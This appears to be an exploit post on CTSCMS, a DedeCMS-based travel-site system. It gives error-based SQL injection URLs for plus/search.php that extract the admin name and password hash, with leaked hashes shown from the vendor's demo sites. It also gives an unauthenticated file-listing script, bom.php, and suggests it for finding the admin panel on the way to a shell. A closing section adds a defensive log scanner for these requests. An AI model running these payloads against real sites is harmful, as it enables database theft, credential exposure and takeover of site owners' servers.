China Travel Service website management system (CTSCMS.COM) is a professional provider of travel website source code, travel website templates and travel website construction services, focusing on tourism e-commerce development for travel agencies and tourism IT.
CTSCMS is in fact built on DedeCMS ("weaving dream") templates, repackaged as its own commercial version, and it actually sells for 500 yuan.
To see the update date, check:
data/admin/ver.txt
It is generally from 2010, so it may also be possible to getshell directly.
exp:
http://www.0day5.com/plus/search.php?keyword=as&typeArr[1 1 1%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+
%2 3@__admin+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@
"+]=a
Default admin backend address is
If the backend can't be found, that's fine too: while viewing the page source I found something interesting.
bom.php
```php
<?php
// remove the utf-8 boms
// by magicbug at gmail dot com
if (isset($_GET['dir'])) { // config the basedir (taken from the request unchecked)
    $basedir = $_GET['dir'];
} else {
    $basedir = '.';
}
$auto = 1; // 1 = strip the BOM automatically when one is found
checkdir($basedir);

// Recursively walk $basedir and print every file name with its BOM status.
function checkdir($basedir) {
    if ($dh = opendir($basedir)) {
        while (($file = readdir($dh)) !== false) {
            if ($file != '.' && $file != '..') {
                if (!is_dir($basedir . "/" . $file)) {
                    echo "filename: $basedir/$file ";
                    echo checkBOM("$basedir/$file") . " <br>";
                } else {
                    $dirname = $basedir . "/" . $file;
                    checkdir($dirname);
                }
            }
        }
        closedir($dh);
    }
}

// Report whether the file starts with the UTF-8 BOM (EF BB BF); remove it when $auto is set.
function checkBOM($filename) {
    global $auto;
    $contents = file_get_contents($filename);
    $charset[1] = substr($contents, 0, 1);
    $charset[2] = substr($contents, 1, 1);
    $charset[3] = substr($contents, 2, 1);
    if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {
        if ($auto == 1) {
            $rest = substr($contents, 3);
            rewrite($filename, $rest);
            return ("<font color=red>BOM found, automatically removed.</font>");
        } else {
            return ("<font color=red>BOM found.</font>");
        }
    }
    else return ("BOM Not Found.");
}

// Overwrite the file with $data under an exclusive lock.
function rewrite($filename, $data) {
    $filenum = fopen($filename, "w");
    flock($filenum, LOCK_EX);
    fwrite($filenum, $data);
    fclose($filenum);
}
?>
```
It can list all the files, hehe~ so you know what to use when the backend can't be found.
To find the backend, just look for sys_safe.php in the listing.
The official demo version:
http://c.ctscms.com/plus/search.php?keyword=as&typeArr[1 1 1%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+
%2 3@__admin+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@
"+]=a
Error infos: Duplicate entry ‘1|ctscms|d7f10e7cca0693eb8561’ for key ‘group_key’
http://s.ctscms.com/plus/search.php?keyword=as&typeArr[1 1 1%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+
%2 3@__admin+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@
"+]=a
Error infos: Duplicate entry ‘1|ctscms|c6364c485d55bb9df83a’ for key ‘group_key’
Getting a shell from the backend is not explained here~
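For site owners checking whether these two entry points have been hit, the following log check is an added example and not part of the original post. It assumes a combined-format access log and that legitimate `typeArr` keys are plain numeric ids (an assumption; the page does not show search.php itself); the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/May/2013:14:48:15 +0800] "GET /plus/search.php?keyword=as&typeArr[3]=a HTTP/1.1" 200 5120',
    '203.0.113.9 - - [04/May/2013:14:49:02 +0800] "GET /plus/search.php?keyword=as&typeArr[1+and+(select+1+from+information_schema.tables)]=a HTTP/1.1" 200 811',
    '203.0.113.9 - - [04/May/2013:14:50:40 +0800] "GET /bom.php?dir=../data HTTP/1.1" 200 20480',
    '198.51.100.7 - - [04/May/2013:14:51:00 +0800] "GET /index.php HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TYPEARR_RE = re.compile(r'^typeArr\[(.*)\]$', re.S)

def classify(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # parse_qsl percent-decodes names, so typeArr%5B...%5D is handled too.
    params = parse_qsl(url.query, keep_blank_values=True)
    findings = []
    if url.path.endswith('/plus/search.php'):
        for name, _ in params:
            key = TYPEARR_RE.match(name)
            # Assumption: a legitimate array key is empty or a decimal id.
            if key and not re.fullmatch(r'[0-9]*', key.group(1)):
                findings.append('search.php: non-numeric typeArr key')
    if url.path.endswith('/bom.php'):
        # bom.php walks and rewrites files for any caller, so every hit matters.
        findings.append('bom.php: directory walk requested')
    return findings

def scan(lines):
    """Return (line_index, finding) pairs for every suspicious line."""
    return [(i, f) for i, line in enumerate(lines) for f in classify(line)]

if __name__ == '__main__':
    for idx, finding in scan(SAMPLE_LOG):
        print(idx, finding)
```

Any hit on bom.php is also a reason to remove that script from the web root, since it needs no login to list and rewrite files.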